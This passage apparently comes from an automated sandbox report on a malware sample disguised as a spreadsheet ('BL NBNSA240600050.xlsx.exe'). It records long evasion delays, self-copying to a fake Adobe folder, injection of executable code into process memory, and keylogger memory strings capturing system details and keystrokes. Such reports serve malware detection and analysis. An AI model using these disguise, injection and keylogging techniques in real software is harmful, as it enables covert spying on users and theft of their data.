                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239891Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239770Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239641Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239531Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239422Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239313Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239188Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 239063Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238953Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238844Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238719Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238587Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238266Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238157Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 238047Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599859Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599733Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599625Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599516Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599406Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599297Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599187Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 599078Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598969Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598844Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598734Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598625Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598515Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598406Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598297Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598185Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 598078Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597969Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597844Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597734Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597625Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597515Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597406Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597297Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597188Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 597063Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596938Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596719Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596594Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596484Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596375Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596264Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596156Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 596047Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595937Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595828Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595719Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595594Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595484Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595315Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595203Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 595094Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594984Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594875Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594766Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594656Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594547Jump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeThread delayed: delay time: 594438Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239875Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239765Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239656Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239546Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239312Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239187Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239078Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599655Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599531Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599422Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599311Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599188Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599063Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598953Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598828Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598718Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598609Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598500Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598336Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598219Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597872Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597765Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597656Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597547Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597438Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597313Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597188Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597063Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596828Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596719Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596594Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596484Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596375Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596266Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596156Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596047Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595938Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595813Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595703Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595594Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595469Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595344Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595234Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595125Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595016Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594766Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594649Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594546Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594436Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594328Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 240000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239843Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239733Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239625Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239513Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239406Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239296Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 239177Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599889
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599672
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599563
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599438
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599313
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599188
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599078
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598969
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598844
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594985
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594860
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594735
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594610
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594485
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594360
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594235
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594110
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 593985
                        Source: adobe.exe, 00000004.00000002.4113601588.0000000001530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                        Source: adobe.exe, 00000007.00000002.4113469373.0000000001018000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4112215369.0000000000A21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeMemory written: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeProcess created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 08/08/2024 11:13:58<br>User Name: user<br>Computer Name: 405464<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.33<br><hr><b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}r{Win}r</html>
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq><b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}r{Win}THpq
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq?<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}r{Win}rTHpq
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq3<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq9<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}rTHpq
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $kq8<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}THpq
                        Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRkq
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
